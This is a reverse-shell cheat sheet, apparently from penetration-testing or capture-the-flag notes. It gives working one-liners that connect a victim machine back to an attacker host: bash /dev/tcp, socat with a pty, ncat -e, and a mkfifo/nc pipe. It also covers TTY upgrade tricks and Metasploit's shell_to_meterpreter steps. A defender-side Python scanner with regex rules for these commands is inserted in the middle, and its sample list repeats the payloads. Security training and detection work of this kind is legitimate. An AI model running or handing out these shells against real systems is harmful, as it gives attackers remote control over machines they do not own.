Shells
Bash
The classic bash-based reverse shell:
/bin/bash -i >& /dev/tcp/TargetIP/TargetPort 0>&1
Note: If the payload doesn't work because redirection or ampersand characters are mangled by the vulnerable application, base64 encoding the payload often works well.
Socat TTY Shell
This gives a full TTY shell straight away, so there is no need to upgrade it. It does require socat to be installed on the victim machine, or a static socat binary to be uploaded there.
On Kali (attacker machine):
socat file:`tty`,raw,echo=0 tcp-listen:4444
On the victim machine:
./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:YOUR_IP_ADDRESS_HERE:4444
Once the connection is made, you probably want to increase the terminal size (run in the reverse shell on the victim machine):
stty rows 57 cols 211
Ncat
Listen to port 8001 on attacker machine:
sudo nc -lnvp 8001
Run ncat on the victim machine:
ncat ATTACKER_IP_HERE 8001 -e /bin/bash
Note: The command is ncat, not nc or netcat. There is a difference!
Mkfifo
sh-based mkfifo reverse shell:
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc ATTACKER_IP_HERE ATTACKER_PORT_HERE >/tmp/f
Upgrading Normal Shells to TTY shells
Switch From ZSH To Bash
Warning: The upgrade steps below don't work if your attacking machine uses zsh!
You can temporarily switch to bash:
exec bash --login
You can confirm you're using bash with:
ps -p $$
Upgrade the Shell Using Python
Run this in the reverse shell to upgrade it. Don't worry if your terminal turns weird temporarily.
python -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo
fg
export TERM=xterm
Upgrade the Shell Without Python
script -qc "/bin/bash -i" /dev/null
CTRL+Z
stty raw -echo
fg
export TERM=xterm
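As an added defender-side example that is not part of the original page: a small Python scanner that flags process command lines matching the reverse-shell one-liners (bash /dev/tcp, socat pty exec, ncat -e, mkfifo/nc pipe) and the TTY upgrade commands (pty.spawn, script -qc) documented above. The rule names and the sample command lines are constructed for illustration.

```python
import re

# Each rule is a regex for one of the one-liners documented above. Names
# are constructed for this example; tune the patterns to your own telemetry.
RULES = {
    "bash_dev_tcp": re.compile(r"/dev/tcp/\S+/\d+"),
    "socat_pty_exec": re.compile(r"\bsocat\b.*\bexec:.*\bpty\b"),
    "ncat_exec": re.compile(r"\bn(?:cat|c)\b.*\s-e\s*/bin/(?:ba)?sh"),
    "mkfifo_pipe": re.compile(
        r"\bmkfifo\b.*\|\s*(?:/bin/)?(?:ba)?sh\s+-i.*\|\s*n(?:cat|c)\b"),
    "python_pty_spawn": re.compile(r"\bpty\.spawn\("),
    "script_pty": re.compile(r"\bscript\b.*-q?c\s+[\"']?/bin/(?:ba)?sh"),
}


def classify(cmdline):
    """Return the names of every rule that matches one process command line."""
    return [name for name, rx in RULES.items() if rx.search(cmdline)]


def scan(lines):
    """Return (line, hits) pairs for every line matching at least one rule."""
    results = []
    for line in lines:
        hits = classify(line)
        if hits:
            results.append((line, hits))
    return results


# Constructed sample process command lines (not real captured data).
SAMPLE_CMDLINES = [
    "/bin/bash -i >& /dev/tcp/10.0.0.5/4444 0>&1",
    "./socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:10.0.0.5:4444",
    "ncat 10.0.0.5 8001 -e /bin/bash",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.5 4444 >/tmp/f",
    "python -c 'import pty;pty.spawn(\"/bin/bash\")'",
    'script -qc "/bin/bash -i" /dev/null',
    "cat /var/log/syslog | grep -i error",      # benign
    "curl -s https://example.invalid/health",   # benign
]

if __name__ == "__main__":
    # Prints the six suspicious lines; the two benign ones produce no hit.
    for line, hits in scan(SAMPLE_CMDLINES):
        print(f"{', '.join(hits):18} {line}")
```

Feed it the command lines from your process-creation telemetry (auditd execve records, EDR events) rather than the sample list to use it for real.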
Upgrading Normal Shells to Meterpreter
Run msfconsole. Create a listener using multi/handler:
use exploit/multi/handler
set lhost YOUR_IP_ADDRESS
set lport 4444
run
Then use one of the above reverse shells to connect to the listener. Once you have the shell, press CTRL + Z to background the shell session. It will tell you the session number. Keep that in mind.
Next:
use post/multi/manage/shell_to_meterpreter
set session SESSION_NUMBER
run
Once the upgrade finishes, you'll be able to see your new session:
sessions -l
Note: There's a long-standing bug where it seems to get stuck on "Stopping exploit/multi/handler". Just press enter, it's not actually stuck.
Interact with the new session with:
sessions -i NEW_SESSION_NUMBER